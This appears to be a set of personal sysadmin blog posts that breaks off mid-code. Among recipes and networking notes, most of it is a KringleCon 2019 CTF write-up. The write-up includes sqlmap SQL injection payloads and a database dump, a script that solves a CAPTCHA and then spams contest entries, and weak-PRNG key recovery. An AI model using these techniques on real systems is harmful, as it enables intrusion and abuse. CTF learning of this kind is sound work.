Serves two. If cooking for more, add more spaghetti and … Ingredients:
- sauce:
- 1/2 Parmigiano
- 4 eggs
- cream
- garlic, oil
- one package of bacon and a bit of ham :)
- spaghetti
- salt
if (doc['bytes.keyword'].size()!=0) { return Integer.parseInt(doc['bytes.keyword'].value) }
This took me a while to figure out!
The above only works for Integer (so no 1.1 or 2.22).
It works on ELK 7.10
I needed it because I’m using %{COMBINEDAPACHELOG} GROK pattern.
That GROK pattern ships with logstash and just says %{NUMBER:bytes}, and NUMBER is (?:%{BASE10NUM})
https://github.com/logstash-plugins/logstash-patterns-core/blob/master/patterns/httpd#L5
There’s actually a way to specify in the grok pattern that it’s an integer:
%{NUMBER:field:integer}
https://github.com/logstash-plugins/logstash-patterns-core/issues/173 is an issue about this that has been open since 2016.
I guess what I should do is just make my own pattern with this fixed where I want it… I would really like to not fiddle with templates or add logstash mutate rules.
https://www.perdue.com/recipes/easy-thai-coconut-chicken-soup/2352/
Another submission courtesy of Eberhard.
Run anything here at your own risk. From what I can tell the commands should be fairly safe. Do make sure you run them on the switch itself. Pretty nice in case you don't want to shell out for a Brocade-branded USB stick to transfer firmware!
Hi,
I found a description of how to format a USB stick so that it can be
accessed by the Brocade OS.
In fact, after some investigation I noticed an error in this description
that prevents access to the specially configured stick.
To make life easier I modified the /sbin/hotplug script by adding one line.
Now any USB-Stick may be used for installation or backup purposes.
The modified hotplug script adds the VENDOR string to
/etc/fabos/usbstorage.conf if the vendor is unknown.
If you rerun the "usbstorage -e" command, the previously unknown vendor's
stick is recognized by hotplug
and the activation of access succeeds!
It might be annoying to activate a stick twice, but this only has
to be done if the vendor of the
USB stick is new to your Brocade switch.
FabOS is capable of handling VFAT32-formatted sticks.
The stick needs 5 directories (one parent and four children):
/brocade/
/brocade/config
/brocade/firmware
/brocade/firmwarekey
/brocade/support
Here is the diff
# diff hotplug.orig hotplug
The output below means – "Add the 'echo …' bit on line 62"
62c62
<
---
> echo "VENDOR $vendor" >> $USBCONFIG
63a64
>
All of this has been tested with FOS v7.4.2f.
Insert stick in a switch and run this script as root:
#!/bin/bash -x
insmod /lib/modules/default/kernel/drivers/usb/core/usbcore.ko
insmod /lib/modules/default/kernel/drivers/usb/host/hcd-driver.ko
insmod /lib/modules/default/kernel/drivers/usb/storage/usb-storage.ko
sleep 10
lsmod | grep usb
/bin/mknod -m 660 /dev/sda b 8 0
/bin/mknod -m 660 /dev/sda1 b 8 1
/bin/mknod -m 660 /dev/sda2 b 8 2
Sometimes the above script fails and you need to re-run it until lsmod lists usb_storage and usbcore as loaded kernel modules.
Now I can mount an ext3 formatted USB-stick:
# mkdir /usb_ext3
# mount -t ext3 /dev/sda1 /usb_ext3
# ls /usb_ext3/
bin/ dev/ fabos/ libexec@ sbin/ tftpboot/ var/
boot/ diag@ import/ mnt/ share@ tmp/
config/ etc/ initrd/ proc/ standby_sbin/ users/
core_files/ export/ lib/ root/ support_files/ usr/
# mkdir /usb_vfat
# mount -t vfat /dev/sda1 /usb_vfat
# ls /usb_vfat/
.Trash-1000/ brocade/ config/ firmware/ firmwarekey/ hda1.dmp* support/
I'll stop here for the moment because now I need to know how u-boot
starts an OS from a USB stick…
This post is based on a submission from Eberhard, a reader of this blog – probably primarily of the popular Brocade SAN upgrades post. Many thanks for this, hoping it will help someone out there!
The topic here is how to replace the embedded Compact Flash card if that breaks.
You can read about how to do that in the PDF below:
If your CF drives are exactly the same size (not in GB, in blocks) as the one in the Brocade, then you could get away with dd'ing the whole /dev/sda – which would simplify the process a little.
Again, many thanks for the contribution!
Changing apartments again, so a pretty decent time to change the network at home.
Doing it a bit on the cheap this time around.
We'll get a DOCSIS cable connection. Fortunately I have a modem used to connect to the same ISP from a previous apartment. Unfortunately the modem was a bit shit – it used to reboot, or need a reboot, every now and then.
The plan is now to put the modem into bridge mode and move the brains into two other devices.
First device: a Raspberry Pi 3B with OpenWrt installed. It'll have an extra Realtek 8153 1 Gbps USB NIC.
The internal 100 Mbps NIC goes to the LAN and will run the DHCP server. The external one will have the WAN connection. The RPi 3B also has WiFi, but it's only 2.4 GHz so we'll only use that for local admin access.
Second device is a Cisco AP that I blogged about not too long ago. That can do 5 GHz :) It hasn't been used yet, but I set it up so I can just plug it into an L2 network with DHCP and it should just work.
Will also use an unmanaged switch to connect stuff on the LAN.
One nice thing about the current apartment is the Ethernet in all rooms. The new one might only have one cable TV/antenna port. Hoping for more. I'd rather not have to use Ethernet over Power, as there's also a media server to connect to the LAN or WiFi near the Chromecast. Sometimes it's nice to not throw everything away – I thought I had thrown away the cable modem too, but it turns out I hadn't. A new one is 180€ and used ones seem to go quite quickly on second-hand marketplaces.
And I’m on holiday :)
Wasn't really expecting to be able to go on holiday working for a startup, but there's some coverage and the old IT admin is still there, so it's very nice to be able to take time off and not have to worry. I even get some more later in the summer. All those extra hours I managed to squeeze in by not commuting to work got me a few extra weeks of holiday :)
Got lots of things in the pipeline to think about though. Without going into much detail, they are important but quite some distance from what I've worked with so far – basically a whole ecosystem to get familiar with. Soon I'll have to decide if I want to do it the hacky way, learn the proper way, or try to outsource it. But what I want shouldn't come first, what makes business sense should.
So far have enjoyed getting reacquainted with the ELK stack and getting acquainted with Prometheus for monitoring. No fancy queries yet, but so far looking quite OK.
Unsurprisingly I’ve also enjoyed doing some documentation work and keeping things patched :)
Was reminded that today is exactly one calendar month since I joined IQM Finland.
It's been a very hectic month and it's been mostly remote because of the pandemic. I have met a few people and video-chatted with a few more. We have these weekly lunch meetings that are a good way to see and hear people. I try to bring up a few social, non-work things in the video meetings just to get to know people a little.
I’m really enjoying it and it’s been interesting to see how the company mindset makes such a difference to my work as a sysadmin/it specialist.
Ingredients:
Instructions:
Water and a stock cube into one pot.
Sausages into a pan, maybe 4/10 heat. Use a lid and turn the sausages often. Use a fork and poke a few holes in the sausages when they're almost done. 20 min? At 30 min, and with the holes poked too early, the sausages came out a bit dry but still good.
Butter into the other pot, then onion and rice. 4 min.
Then add more of the water to the risotto pot whenever it has been absorbed. The rice is done when it's soft.
Finally add the sausages and Parmigiano.
Serve!
9 years were significant and meaningful to me.
We did a lot of cool things that as a very nice side benefit helped research, both in Finland and in other places!
I’ve been involved in some core projects, both for internal users and external ones. I was free to release code as open source. I have solved hard problems, gotten rid of manual work with automation and helped people grow.
I’m happy to have met great friends and colleagues at CSCfi. I’ve learned so much and many thanks for showing how to work right and that it’s not all about 9-5 work.
It has been a rewarding experience. I like to think I’ve come quite some way from where I started. So long, @CSCfi, and thanks for (all the fish) lasting memories!
While the AP is in non-autonomous mode you need to run a debug command to get to conf t: debug capwap console cli
To change it from using a controller to autonomous mode you need to load an autonomous firmware image. The one I got had a firmware loaded that wanted to talk to a controller.
These release notes got me a bit worried: https://www.cisco.com/c/en/us/td/docs/wireless/access_point/ios/release/notes/aap-rn-83mr5.html
Conversions from an 8.0 Wireless LAN Controller unified release AP image to autonomous 15.3(3) k9w7 image will get aborted with a message "AP image integrity check failed." To overcome this, load any previous autonomous k9w7 image and then upgrade to the 15.3(3) JAB k9w7 images. If this refers to the LWAPP version, mine was 7.3.x, so the above did not apply.
https://greenwhitehat.blogspot.com/2017/08/how-to-configure-cisco-access-point-air.html
https://www.fragmentationneeded.net/2010/08/tftp-oddities.html is talking about changing listening address to 255.255.255.255 instead of 0.0.0.0 ..
$ ena
# conf t
# debug capwap console cli
# archive download-sw /force-reload /overwrite tftp://10.0.0.2/c1140-k9w7-tar.153-3.JD17.tar
Easiest is probably to use the web UI on http://IP:80 to configure it.
Username/Password: Cisco/Cisco
There’s the express setup and I used these settings:
Other changes:
One could enable https, but that used a too weak key by default so I just left it at http. In any case make sure to set the clock before enabling https.
Previous post in this blog about my home network: https://www.guldmyr.com/blog/home-network-convergence/
http://wiki.r1soft.com/display/ServerBackup/Configure+a+TFTP+server+on+Linux
http://exchange2013pikasuoh.blogspot.com/2015/08/convert-cisco-air-lap1142n-k9-to.html
In my youth I enjoyed the LANs. One fun game we played was Quadra – which is a multiplayer tetris where by playing the game you send more blocks to your opponents making it very stressful :D
https://github.com/quadra-game/quadra turns out it is open source and it’s out there!
Does it still build?
CentOS 7.7:
$ sudo yum install git
$ git clone https://github.com/quadra-game/quadra
$ sudo yum groupinstall "Development Tools"
$ sudo yum install SDL2-devel boost-devel libpng-devel
$ cd quadra
$ autoreconf -i
$ ./configure
$ make
It DOES!
Does it run!?
$ QUADRADIR=. ./quadra
And I get a very nice window :)
I could even launch one process to run a server and then another one and connect to localhost :) So multiplayer must surely work!
It's a bit laggy – I recall it being very snappy, because I was da bomb at this game :)
I blame this on possibly having missed some dependency so it fell back to some slower path, and/or maybe the graphics card in this laptop is not good (maybe it's too new? It's a Skylake GT2 HD Graphics 520).
Tasty. Compared to the one I had before, this one smelled much more of chocolate and less burnt..
Hoe the season to be jolly! Been playing a few CTFs lately. It started with the Disobey 2020 puzzle to get the hacker ticket. Then there was OverTheWire's 2019 advent CTF. And finally this one, the SANS Holiday Hack Challenge – KringleCon 2019. As of writing I got what felt like quite far in the Disobey one but got really nicely stuck at the second keyhole. For OTW I found a similar but slightly easier challenge on the 6th of December, but did not manage to get the key. Most of the others except the first one and challenge-zero I didn't really have time for. So with not so much progress it was very nice to take a step back and try out KringleCon, where I managed to get a bit further!
#!/usr/bin/python3
import random
#numbers = [ 1, 3, 7 ]
results = []
length = 4
digits = 1337
# from https://linuxconfig.org/function-to-check-for-a-prime-number-with-python
def is_prime_number(x):
    if x >= 2:
        for y in range(2,x):
            if not ( x % y ):
                return(False)
    else:
        return(False)
    return(True)
# from https://trinket.io/python3/00754ec904
while len(results) < 1000:
    for digit in range(1):
        digits = ''.join(str(random.randint(0, 9)) for i in range(length))
        if "3" in digits and "1" in digits and "7" in digits and not "0" in digits and not "2" in digits and not "4" in digits and not "5" in digits and not "6" in digits and not "8" in digits and not "9" in digits:
            if digits not in results:
                if is_prime_number(int(digits)):
                    results.append(digits)
                    print(digits)
You’ll need to hit CTRL+C when it doesn’t find any more solutions. It’s not the fastest, has unused bits and I don’t know why it has the for digit in range(1) bit.
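For comparison, here is a cleaner sketch (my rewrite, not the code I used during the challenge) that just walks every 4-digit string built from the digits 1, 3 and 7 and checks primality, instead of sampling randomly:
#!/usr/bin/python3
# Alternative sketch: enumerate all 4-digit candidates made of 1, 3 and 7
# and keep the primes that use all three digits.
from itertools import product

def is_prime(n):
    if n < 2:
        return False
    for d in range(2, int(n ** 0.5) + 1):
        if n % d == 0:
            return False
    return True

for combo in product("137", repeat=4):
    candidate = "".join(combo)
    if {"1", "3", "7"} <= set(candidate) and is_prime(int(candidate)):
        print(candidate)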
#!/usr/bin/python3
import json
with open('sysmon-data.json') as json_file:
    data = json.load(json_file)
for p in data:
    try:
        print(p['command_line'])
    except:
        print(p['process_name'])
Finally got to get a bit familiar with powershell. I’m a lurker on r/sysadmin and very often there are powershell oneliners on display there. This was quite a fun one to be honest :) Kind of like using python directly in the shell.
Some things I learnt were:
$files = Get-ChildItem -Path /home/elf/depths -Recurse -File
Foreach ($file in $files)
{
    if((Get-FileHash -Path $file.fullname -Algorithm MD5).hash | Select-String 25520151A320B5B0D21561F92C8F6224){
        $file
    }
}
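The same hunt could also be sketched in Python, in case PowerShell isn't handy (same path and MD5 as above, hash lowercased):
#!/usr/bin/python3
# Walk /home/elf/depths and print any file whose MD5 matches the wanted hash.
import hashlib
import os

WANTED = "25520151a320b5b0d21561f92c8f6224"

for root, dirs, files in os.walk("/home/elf/depths"):
    for name in files:
        path = os.path.join(root, name)
        with open(path, "rb") as f:
            if hashlib.md5(f.read()).hexdigest() == WANTED:
                print(path)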
Could have found this with a recursive grep for temperature -e angle -e param…
The solution:
(Invoke-WebRequest -Uri http://localhost:1225/api/off).RawContent
$correct_gases_postbody = @{O='6';H='7';He='3';N='4';Ne='22';Ar='11';Xe='10';F='20';Kr='8';Rn='9'}
(Invoke-WebRequest -Uri http://localhost:1225/api/gas -Method POST -Body $correct_gases_postbody).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/angle?val=65.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/temperature?val=-33.5).RawContent
(Invoke-WebRequest http://127.0.0.1:1225/api/refraction?val=1.867).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/on).RawContent
(Invoke-WebRequest -Uri http://localhost:1225/api/output).RawContent
#1
sudo iptables -P FORWARD DROP
sudo iptables -P INPUT DROP
sudo iptables -P OUTPUT DROP
#2
# should this be two lines? the iptables output orders them RELATED,ESTABLISHED..
sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
#3
sudo iptables -A INPUT -p tcp --dport 22 -s 172.19.0.225 -j ACCEPT
#4
sudo iptables -A INPUT -p tcp --dport 21 -s 0.0.0.0/0 -j ACCEPT
sudo iptables -A INPUT -p tcp --dport 80 -s 0.0.0.0/0 -j ACCEPT
#5
sudo iptables -A OUTPUT -p tcp --dport 80 -d 0.0.0.0/0 -j ACCEPT
#6
sudo iptables -A INPUT -i lo -j ACCEPT
Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
haha! if you reload the page the codes needed are different!
1. B46DU583 - top of the console
2. XNUBLBKW - see it by looking in the print preview (Ctrl+P)
3. unknown, fetched but never shown..
ha this was funneh, so clicking around the tabs I found a javascript file that needed some deobfuscation (jsnice.org) and in it was var _0x1e21
so I ran that in the console with the values found in if statements and eventually:
console.log(_0x1e21["jIdunh"]);
and it printed a bunch of things, and element 34 had an image:
console.log(_0x1e21["jIdunh"][34]);
VM3008:1 images/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12.png
which was an image with the combination to the 3rd lock
4. ILMJRNTP found in local storage
5 CJ4WCMG4 - <title></title>
6. from the card.. Y3WJVE01 sticker - but if one removes the hologram CSS the letters are in a different order JYV0EW13.
7. G7LDS1LS - font family
8 VERONICA In the event that the .eggs go bad, you must figure out who will be sad.
From client.js, deobfuscated to make it a bit readable, and then just read through
9 8SEOGRW1
chakra in css file
https://sleighworkshopdoor.elfu.org/css/styles.css/73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12
10. component.swab, bunch of things around lock c10
finding .locks > li > .lock.c10 .cover
one can remove the cover
on the board there's a code: KD29XJ37
but all the other codes have been per session..
console.log says "Missing macaroni"
In the code there's:
console["log"]("Well done! Here's the password:");
console[_0x1e21("0x45")]("%c" + args["reward"], _0x1e21("0x46"));
In the console there's this whenever one presses the unlock:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Error: Missing macaroni!
at HTMLButtonElement.<anonymous> (73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1)
(anonymous) @ 73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1
there's a bunch of "<div class="component gnome, mac, swab" with data-codes: XJ0 A33 J39
Dragging the components further down changed the error and printed this in the console:
Well done! Here's the password:
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 The Tooth Fairy
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 You opened the chest in 6291.088 seconds
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Well done! Do you have what it takes to Crack the Crate in under three minutes?
73cda8f4-6dc7-4edc-adb8-b2bd4b3ecd12:1 Feel free to use this handy image to share your score!
console.log(document.title)
some are maybe fixed??:
VERONICA
KD29XJ37
However, after doing that as fast as I could manually:
You opened the chest in 150.151 seconds
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Very impressive!! But can you Crack the Crate in less than five seconds?
621c8819-1d6a-4d77-bd41-5214a6beccf5:1 Feel free to use this handy image to share your score!
head conn.log|jq '.["id.orig_h"],.duration' -c 'sort_by(.duration)'
cat conn.log|jq -s -c 'sort_by(.duration)' > /tmp/sorted
cat /tmp/sorted # ... took forever, then just looked at the bottom:
{"ts":"2019-0
4-18T21:27:45.402479Z","uid":"CmYAZn10sInxVD5WWd","id.orig_h":"192.168.52.132","id.orig_p":8,"id.r esp_h":"13.107.21.200","id.resp_p":0,"proto":"icmp","duration":1019365.337758,"orig_bytes":3078192 0,"resp_bytes":30382240,"conn_state":"OTH","missed_bytes":0,"orig_pkts":961935,"orig_ip_bytes":577 16100,"resp_pkts":949445,"resp_ip_bytes":56966700}]
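If jq feels awkward, the same sort can be sketched in plain Python (assuming conn.log is the JSON export with one object per line):
#!/usr/bin/python3
# Read Zeek's JSON conn.log and print the longest connections last.
import json

entries = []
with open("conn.log") as f:
    for line in f:
        line = line.strip()
        if line:
            entries.append(json.loads(line))

entries.sort(key=lambda e: e.get("duration") or 0)
for e in entries[-5:]:
    print(e["id.orig_h"], e.get("duration"))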
Finishing each challenge gives some tips to some other challenges. There was a hint to the Sled Route API suggesting to use jq. And there was another that if you beat the Trail Game on Hard there’s more hints? Also beating the lock game in under 3 minutes is another hint I think..
And then we get to the CAPTCHA + tensorflow madness! This was real fun, haven’t had to do much with tensorflow before. Did not have to read much at all about tensorflow to get this going, could basically just glue together the provided python scripts.
Another very good KringleCon talk on this topic: https://www.youtube.com/watch?v=jmVPLwjm_zs&feature=youtu.be led to a github repo. Some other code and training images were found as soon as one got far enough into the Steam Tunnels. After not too much googling I managed to get the python script to store the images from the CAPTEHA in a directory and then run the predict tensorflow python script from the github repo against it. It was however too slow. Fortunately I had access to a machine with lots of cores, so moving all the data there and re-running the python got it working for me. 2 oversubscribed cores and 2GB RAM was too little; 80 dedicated single-server Skylake cores and 356GB RAM completed it much faster. There were messages about the tensorflow from pip not having been compiled with all the optimizations enabled. I suppose I could also have tried this with a GPU :) And the PYTHON:
#!/usr/bin/env python3
# Fridosleigh.com CAPTEHA API - Made by Krampus Hollyfeld
import requests
import json
import sys
import os
import shutil
import base64
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.ERROR)
import numpy as np
import threading
import queue
import time
def load_labels(label_file):
    label = []
    proto_as_ascii_lines = tf.gfile.GFile(label_file).readlines()
    for l in proto_as_ascii_lines:
        label.append(l.rstrip())
    return label
def predict_image(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation):
    image = read_tensor_from_image_bytes(image_bytes)
    results = sess.run(output_operation.outputs[0], {
        input_operation.outputs[0]: image
    })
    results = np.squeeze(results)
    prediction = results.argsort()[-5:][::-1][0]
    q.put( {'img_full_path':img_full_path, 'prediction':labels[prediction].title(), 'percent':results[prediction]} )
def load_graph(model_file):
    graph = tf.Graph()
    graph_def = tf.GraphDef()
    with open(model_file, "rb") as f:
        graph_def.ParseFromString(f.read())
    with graph.as_default():
        tf.import_graph_def(graph_def)
    return graph
def read_tensor_from_image_bytes(imagebytes, input_height=299, input_width=299, input_mean=0, input_std=255):
    image_reader = tf.image.decode_png( imagebytes, channels=3, name="png_reader")
    float_caster = tf.cast(image_reader, tf.float32)
    dims_expander = tf.expand_dims(float_caster, 0)
    resized = tf.image.resize_bilinear(dims_expander, [input_height, input_width])
    normalized = tf.divide(tf.subtract(resized, [input_mean]), [input_std])
    sess = tf.compat.v1.Session()
    result = sess.run(normalized)
    return result
# above is from predict_images_using_trained_model.py because python and import meh
###########
def main():
    yourREALemailAddress = "MYREALEmAEL@example.org"

    # Creating a session to handle cookies
    s = requests.Session()
    url = "https://fridosleigh.com/"

    json_resp = json.loads(s.get("{}api/capteha/request".format(url)).text)
    b64_images = json_resp['images']  # A list of dictionaries eaching containing the keys 'base64' and 'uuid'
    challenge_image_type = json_resp['select_type'].split(',')  # The Image types the CAPTEHA Challenge is looking for.
    challenge_image_types = [challenge_image_type[0].strip(), challenge_image_type[1].strip(), challenge_image_type[2].replace(' and ','').strip()] # cleaning and formatting
    #print(b64_images)

    # 0 wipe unknown_images dir
    # why wipe it tho?
    try:
        shutil.rmtree('unknown_images')
    except:
        os.mkdir('unknown_images')
    try:
        os.mkdir('unknown_images')
    except:
        True
    # 1 write b64 to unknown_images dir
    imgcnt = 0
    for image in b64_images:
        imgcnt = imgcnt + 1
        content = image['base64']
        uuid = image['uuid']
        try:
            content = base64.b64decode(content)
            filename = "unknown_images/%s" % uuid
            with open(filename, "wb") as f:
                f.write(content)
                #f.write(content.decode("utf-8"))
        except Exception as e:
            print(str(e))
        # if imgcnt > 10:
        #     break
    # 2 run the predict against it
    # python3 predict_images_using_trained_model.py would have been fun instead we copy pasta
    # https://github.com/chrisjd20/img_rec_tf_ml_demo/blob/master/retrain.py talks about mobilenet and speed optimizations..

    # Loading the Trained Machine Learning Model created from running retrain.py on the training_images directory
    graph = load_graph('/tmp/retrain_tmp/output_graph.pb')
    labels = load_labels("/tmp/retrain_tmp/output_labels.txt")

    # Load up our session
    input_operation = graph.get_operation_by_name("import/Placeholder")
    output_operation = graph.get_operation_by_name("import/final_result")
    sess = tf.compat.v1.Session(graph=graph)

    # Can use queues and threading to spead up the processing
    q = queue.Queue()
    unknown_images_dir = 'unknown_images'
    unknown_images = os.listdir(unknown_images_dir)

    #Going to interate over each of our images.
    for image in unknown_images:
        img_full_path = '{}/{}'.format(unknown_images_dir, image)
        print('Processing Image {}'.format(img_full_path))
        # We don't want to process too many images at once. 10 threads max
        while len(threading.enumerate()) > 10:
            time.sleep(0.0001)

        #predict_image function is expecting png image bytes so we read image as 'rb' to get a bytes object
        image_bytes = open(img_full_path,'rb').read()
        threading.Thread(target=predict_image, args=(q, sess, graph, image_bytes, img_full_path, labels, input_operation, output_operation)).start()

    print('Waiting For Threads to Finish...')
    while q.qsize() < len(unknown_images):
        time.sleep(0.001)

    #getting a list of all threads returned results
    prediction_results = [q.get() for x in range(q.qsize())]

    #do something with our results... Like print them to the screen.
    # 3 get a list of the uuids for each type
    good_images = []
    for prediction in prediction_results:
        print('TensorFlow Predicted {img_full_path} is a {prediction} with {percent:.2%} Accuracy'.format(**prediction))
        if prediction['prediction'] in challenge_image_types:
            good_images.append(prediction['img_full_path'].split('/')[1])
    # TensorFlow Predicted unknown_images/dc646068-e584-11e9-97c1-309c23aaf0ac is a Santa Hats with 99.86% Accuracy

    # 4 make a new b64_images csv list with the uuids
    print(challenge_image_types)
    print(good_images)
    good_images_csv = ','.join(good_images)

    '''
    MISSING IMAGE PROCESSING AND ML IMAGE PREDICTION CODE GOES HERE
    '''

    # This should be JUST a csv list image uuids ML predicted to match the challenge_image_type .
    #final_answer = ','.join( [ img['uuid'] for img in b64_images ] )
    final_answer = good_images_csv
    json_resp = json.loads(s.post("{}api/capteha/submit".format(url), data={'answer':final_answer}).text)
    if not json_resp['request']:
        # If it fails just run again. ML might get one wrong occasionally
        print('FAILED MACHINE LEARNING GUESS')
        print('--------------------\nOur ML Guess:\n--------------------\n{}'.format(final_answer))
        print('--------------------\nServer Response:\n--------------------\n{}'.format(json_resp['data']))
        sys.exit(1)

    print('CAPTEHA Solved!')
    # If we get to here, we are successful and can submit a bunch of entries till we win
    userinfo = {
        'name':'Krampus Hollyfeld',
        'email':yourREALemailAddress,
        'age':180,
        'about':"Cause they're so flippin yummy!",
        'favorites':'thickmints'
    }
    # If we win the once-per minute drawing, it will tell us we were emailed.
    # Should be no more than 200 times before we win. If more, somethings wrong.
    entry_response = ''
    entry_count = 1
    while yourREALemailAddress not in entry_response and entry_count < 200:
        print('Submitting lots of entries until we win the contest! Entry #{}'.format(entry_count))
        entry_response = s.post("{}api/entry".format(url), data=userinfo).text
        entry_count += 1
    print(entry_response)

if __name__ == "__main__":
    main()
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://url?token=$token" -p variable
#!/bin/bash
token=$(curl validation)
sqlmap --url="https://studentportal.elfu.org/application-check.php?elfmail=my%40example.com&token=$token" -p elfmail --eval="import requests;token=requests.get('https://studentportal.elfu.org/validator.php').text"
#SNIPSNIP
Parameter: elfmail (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: elfmail=my@example.com' AND 2977=2977 AND 'tYvj'='tYvj&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: elfmail=me@example.com' AND (SELECT 4602 FROM(SELECT COUNT(*),CONCAT(0x7176786a71,(SELECT (ELT(4602=4602,1))),0x7162626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'XazW'='XazW&token=MTAwOTU4MTk3Njk2MTU3NzQ3MTgzOTEwMDk1ODE5Ny42OTY=_MTI5MjI2NDkzMDUwODgzMjMwNjYyMzI2LjI3Mg==
Could not get the above queries to work in curl.. maybe some escaping mess-up. But sqlmap --users finds stuff.
[18:51:19] [INFO] retrieved: 'elfu'
[18:51:20] [INFO] retrieved: 'applications'
[18:51:21] [INFO] retrieved: 'elfu'
[18:51:22] [INFO] retrieved: 'krampus'
[18:51:23] [INFO] retrieved: 'elfu'
sqlmap had a nice --sql-shell, and with that one could "select * from elfu.krampus", which got us some paths:
select * from elfu.krampus [6]:
[*] /krampus/0f5f510e.png, 1
[*] /krampus/1cc7e121.png, 2
[*] /krampus/439f15e6.png, 3
[*] /krampus/667d6896.png, 4
[*] /krampus/adb798ca.png, 5
[*] /krampus/ba417715.png, 6
Now that looks like an OS path, so we'd need to run a shell command.. but on a whim I tried https://studentportal.elfu.org/krampus/ and yay, found them there. Fired up good old GIMP and learnt about the rotate tool :P Yay, one more objective!
Crypto then. Hint is https://www.youtube.com/watch?v=obJdpKDpFBA&feature=youtu.be > https://github.com/CounterHack/reversing-crypto-talk-public
Crypto then. Running an encryption tells us it uses the unix epoch as a seed, and a hint for the challenge was "We know that it was encrypted on December 6, 2019, between 7pm and 9pm UTC." That is from 1575658800 to 1575666000. There are some super_secure_random and super_secure_srand functions, found with IDA Freeware. Probably they are not super. https://docs.microsoft.com/en-us/windows/win32/api/wincrypt/nf-wincrypt-cryptimportkey for example is one API in use. I wonder what the difference with --insecure is? One error talks about DES-CBC, which the internet says is insecure. It uses 56 bits and 8 bytes. The stack of do_encrypt also says "dd 8", so yay?
00000000 ; [00000008 BYTES. COLLAPSED UNION _LARGE_INTEGER. PRESS CTRL-NUMPAD+ TO EXPAND]
00000000 ; [00000008 BYTES. COLLAPSED STRUCT $FAF74743FBE1C8632047CFB668F7028A. PRESS CTRL-NUMPAD+ TO EXPAND]
Which is used in security_init_cookie and imp__QueryPerformanceCounter. Way more than 8 bytes though.
While looking at these I listened to the youtube talk and it said "running it at the same time generates the same key" – I tried that with two identical files and it generated the same key. What about with two files without the same checksum? Yep. Same. Encryption key. So the next step would be to try to encrypt something for every second between 1575658800 and 1575666000? That's 7200 seconds, which would give us 7200 keys we could try to use to decrypt the file. Is it too much? Right now I'm thinking the --insecure flag might help if one uses the Burp suite to intercept the packets to the elfscrow API server? The time bit in the code uses time64.
call time into eax
then eax as a parameter into:
call super_secure_srand
there is a loop (8 iterations) and inside it calls super_secure_random, which looks complicated, but by googling the numbers in decimal we find: https://rosettacode.org/wiki/Linear_congruential_generator#C
which has
rseed * 214013 + 2531011
# the disassembled code then does:
sar eax, 10h
and eax, 7FFFh
Which is also here: http://cer.freeshell.org/renma/LibraryRandomNumber/
And here I learnt that >> in python is the equivalent of sar.
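Putting those pieces together, here is my reading of the generator as a tiny Python sketch (the 0x7fff mask and keeping only the low byte per round are taken from the asm above, and this mirrors the longer brute-force script further down):
#!/usr/bin/python3
# Sketch of the LCG as read from the disassembly: state update, then
# sar eax, 10h (>> 16) and and eax, 7FFFh (& 0x7fff); generate_key keeps
# only the low byte of each call (movzx ecx, al / and ecx, 0FFh).
def lcg_step(state):
    state = (state * 214013 + 2531011) & 0xFFFFFFFF
    return state, (state >> 16) & 0x7FFF

def key_from_seed(seed):
    key = bytearray()
    state = seed
    for _ in range(8):
        state, value = lcg_step(state)
        key.append(value & 0xFF)
    return bytes(key)

# example: the seed would be the unix timestamp the file was encrypted at
print(key_from_seed(1575658800).hex())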
After going for a walk I thought a bit about what the end goal is here. It is not the key, but it could be. Right now the plan is to generate the secret-id, because the secret-id is what is used to decrypt with the tool, not the key. But maybe the uuid is something you only get from the escrow API server.
$ curl -XPOST http://elfscrow.elfu.org/api/store -d 1234567890abcdef
0e5b05dd-e132-42aa-b699-1829d3e23e2f
$ curl -XPOST http://elfscrow.elfu.org/api/retrieve -d 0e5b05dd-e132-42aa-b699-1829d3e23e2f
1234567890abcdef
Seems it is. And the hex needs to be in lowercase letters, ABCDEF did not fly. The UUID must be in this format: 00000000-0000-0000-0000-000000000000 it seems. Not sure about sqlmap use here. SSH and a web server are running. But SSH has been open on several previous addresses in this CTF too..
WEBrick/1.4.2 (Ruby/2.6.3/2019-04-16) at
elfscrow.elfu.org:443
Actually, what might be doable with just the key is to set up my own API server that just returns the key.. Change the address in the binary, or finally use Burp, or a local DNS override? Still need to figure out the key :))
Generate_key does:
call ?super_secure_random@@YAHXZ ; super_secure_random(void)
movzx ecx, al
and ecx, 0FFh
mov edx, [ebp+buffer]
add edx, [ebp+i]
mov [edx], cl
super_secure_srand does:
something with seed.. really unsure
super_secure_srandom does:
this is doing the rseed, sar, and
#!/usr/bin/python3
# key examples
# dcd5ed4c2acba87e
# 9f32148fe8ef55a8
# 0d2bac4df0a12e5a
# fa41fb5131993bf5
#https://www.aldeid.com/wiki/X86-assembly/Instructions/shr
# like the >> much more than ^
# https://rosettacode.org/wiki/Linear_congruential_generator#Python
def msvcrt_rand(seed):
    def rand():
        nonlocal seed
        fixed = seed
        keyarray = bytearray()
        for i in range(8):
            #ka = (214013*seed + 2531011)
            fixed = fixed * 0x343fd + 0x269ec3
